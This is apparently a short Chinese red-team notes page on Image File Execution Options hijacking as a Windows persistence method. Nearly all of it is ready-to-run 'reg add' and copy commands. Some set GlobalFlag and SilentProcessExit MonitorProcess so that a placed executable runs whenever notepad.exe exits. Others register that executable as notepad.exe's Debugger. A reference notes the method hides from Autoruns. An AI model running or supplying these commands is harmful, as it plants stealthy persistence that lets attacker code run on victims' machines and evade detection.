映像劫持

劫持程序退出事件
命令行
# Use notepad as example
​
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
​
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
​
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\Temp\qwqdanchun.exe"
劫持程序调试选项
命令行
copy C:\Temp\qwqdanchun.exe C:\Windows\System32\qwqdanchun.exe
​
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d "qwqdanchun.exe"
参考文章：
Persistence using GlobalFlags in Image File Execution Options – Hidden from Autoruns.exe
Oddvar Moe's Blog
Persistence – Image File Execution Options Injection
Penetration Testing Lab
​
最近更新 2yr ago